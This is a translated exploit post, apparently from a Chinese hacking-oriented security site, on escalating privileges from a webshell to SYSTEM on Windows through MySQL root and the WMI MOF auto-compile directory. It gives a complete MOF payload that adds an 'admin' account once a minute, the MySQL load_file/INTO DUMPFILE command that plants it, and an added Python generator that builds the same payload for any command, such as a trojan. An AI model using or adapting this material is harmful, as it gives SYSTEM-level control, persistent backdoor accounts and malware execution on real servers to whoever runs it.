Extended use of the MySQL privilege-escalation exploit - Vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201235995
Type myhack58
Reporter 佚名 (anonymous)
Modified 2012-12-06T00:00:00


Original: MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

I have only had a rough look: the original exploit goes wrong somewhere in the file-export path, but exactly how, I would have to read the MySQL source to say. As everyone knows, it needs the target's MySQL to be reachable from outside, and you already need the root password, so on its own it is only good for mass-scanning for bots, and maybe not even that. I think it is more useful for privilege escalation from a webshell, since the UDF route is comparatively troublesome. So it is used as follows:

1. Find a writable directory (mine is C:\recycler\) and write the code below into a file named nullevt.mof there. This is the payload from the original exploit's source:

    #pragma namespace("\\\\.\\root\\subscription")

    // Filter: fires on every change of Win32_LocalTime whose Second field is 5,
    // i.e. once a minute.
    instance of __EventFilter as $EventFilter
    {
        EventNamespace = "Root\\Cimv2";
        Name = "filtP2";
        Query = "Select * From __InstanceModificationEvent "
                "Where TargetInstance Isa \"Win32_LocalTime\" "
                "And TargetInstance.Second = 5";
        QueryLanguage = "WQL";
    };

    // Consumer: JScript run by the WMI service each time the filter fires.
    instance of ActiveScriptEventConsumer as $Consumer
    {
        Name = "consPCSV2";
        ScriptingEngine = "JScript";
        ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
    };

    // Binding: ties the filter to the consumer to make the subscription active.
    instance of __FilterToConsumerBinding
    {
        Consumer = $Consumer;
        Filter = $EventFilter;
    };

Note: the net.exe user admin admin /add above can be changed to anything you like, for example to run your own trojan (it takes no parameters). Because the filter fires whenever Win32_LocalTime.Second equals 5, the command runs once a minute, as SYSTEM, until the subscription is removed.

2. Then connect to the MySQL database from the Chopper webshell and execute the following (load_file() and INTO DUMPFILE need the FILE privilege, which root has):

    select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';


And then... you will find the user has been added. Note: tested on Windows 2003 + MySQL 5.0.45-community-nt, which works; Win7 Ultimate SP1 + MySQL 5.5.28 fails; 2008 not tested. (Windows XP and 2003 automatically compile any .mof file dropped into wbem\mof; Vista and later no longer do, which is why the Win7 test fails.) However, the bug that lets you create a new \lib\plugin directory through an ADS is still there, so that route can also be used to escalate via UDF.
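The post says the hard-coded net.exe command "can be changed to anything you like". Doing that by hand means getting two layers of string escaping right: the command sits inside a JScript string literal, which sits inside a MOF string literal, and a path with backslashes or quotes is easy to break. The script below is an added example, not code from the post or from the exploit it quotes: it generates a MOF of the same shape as the one above for an arbitrary command, builds the MySQL statement from step 2 with the paths properly escaped, and decodes a finished MOF back to the command it would run, as a check before dropping it. Function names and the sample command paths are this example's own choices; the filter and consumer names default to the ones in the post.

```python
"""Generate the nullevt.mof WMI-subscription payload and the MySQL drop statement.

Added example (not from the original post or the exploit it quotes).
Helper names, default paths and the sample commands are assumptions of
this example; "filtP2"/"consPCSV2" are the names used in the post.
"""
import re


def _escape(s: str) -> str:
    # Double-quoted literals in both JScript and MOF use backslash escapes,
    # so the same rule applies at each nesting level.
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")


def _unescape(s: str) -> str:
    # Inverse of _escape: a backslash pair -> backslash, \" -> ", \n -> newline.
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append("\n" if s[i + 1] == "n" else s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def build_script(command: str) -> str:
    """JScript run by the ActiveScriptEventConsumer (first escaping level)."""
    return ('var WSH = new ActiveXObject("WScript.Shell")\n'
            'WSH.run("' + _escape(command) + '")')


def build_mof(command: str, second: int = 5,
              filter_name: str = "filtP2", consumer_name: str = "consPCSV2") -> str:
    """Permanent WMI subscription: the filter fires whenever the local clock's
    seconds field equals `second` (once a minute), the consumer runs the
    JScript, the binding ties them together. Same layout as the post's MOF."""
    if not 0 <= second <= 59:
        raise ValueError("second must be in 0..59")
    query = ('Select * From __InstanceModificationEvent '
             'Where TargetInstance Isa "Win32_LocalTime" '
             'And TargetInstance.Second = %d' % second)
    ns = _escape(r"\\.\root\subscription")   # -> \\\\.\\root\\subscription
    ev_ns = _escape(r"Root\Cimv2")            # -> Root\\Cimv2
    return "\n".join([
        '#pragma namespace("%s")' % ns,
        '',
        'instance of __EventFilter as $EventFilter',
        '{',
        '    EventNamespace = "%s";' % ev_ns,
        '    Name = "%s";' % filter_name,
        '    Query = "%s";' % _escape(query),
        '    QueryLanguage = "WQL";',
        '};',
        '',
        'instance of ActiveScriptEventConsumer as $Consumer',
        '{',
        '    Name = "%s";' % consumer_name,
        '    ScriptingEngine = "JScript";',
        '    ScriptText = "%s";' % _escape(build_script(command)),  # second level
        '};',
        '',
        'instance of __FilterToConsumerBinding',
        '{',
        '    Consumer = $Consumer;',
        '    Filter = $EventFilter;',
        '};',
        '',
    ])


_STR = r'"((?:[^"\\]|\\.)*)"'   # one double-quoted literal, escapes kept as pairs


def command_in_mof(mof: str) -> str:
    """Decode what a MOF of this shape would run: MOF literal -> JScript ->
    WSH.run() argument. Raises ValueError if the MOF is not of that shape."""
    m = re.search(r"ScriptText = " + _STR + ";", mof, re.S)
    if not m:
        raise ValueError("no ScriptText literal found")
    script = _unescape(m.group(1))
    m = re.search(r"WSH\.run\(" + _STR + r"\)", script, re.S)
    if not m:
        raise ValueError("no WSH.run(...) call found")
    return _unescape(m.group(1))


def build_sql(src: str, dst: str = "c:/windows/system32/wbem/mof/nullevt.mof") -> str:
    """MySQL statement that copies src into the auto-compiled wbem\\mof directory.
    load_file()/INTO DUMPFILE need the FILE privilege; MySQL string literals use
    backslash escapes, so backslashes in the paths are doubled."""
    def q(p):
        return p.replace("\\", "\\\\").replace("'", "\\'")
    return "select load_file('%s') into dumpfile '%s';" % (q(src), q(dst))


if __name__ == "__main__":
    mof = build_mof("net.exe user admin admin /add")
    print(mof)
    print("-- decoded command:", command_in_mof(mof))
    print(build_sql(r"C:\RECYCLER\nullevt.mof"))
```

Run it as-is and the output is the post's MOF and the post's SQL statement; pass build_mof() a path such as C:\recycler\x.exe and the doubled and quadrupled backslashes in the output are what the JScript and MOF layers actually require.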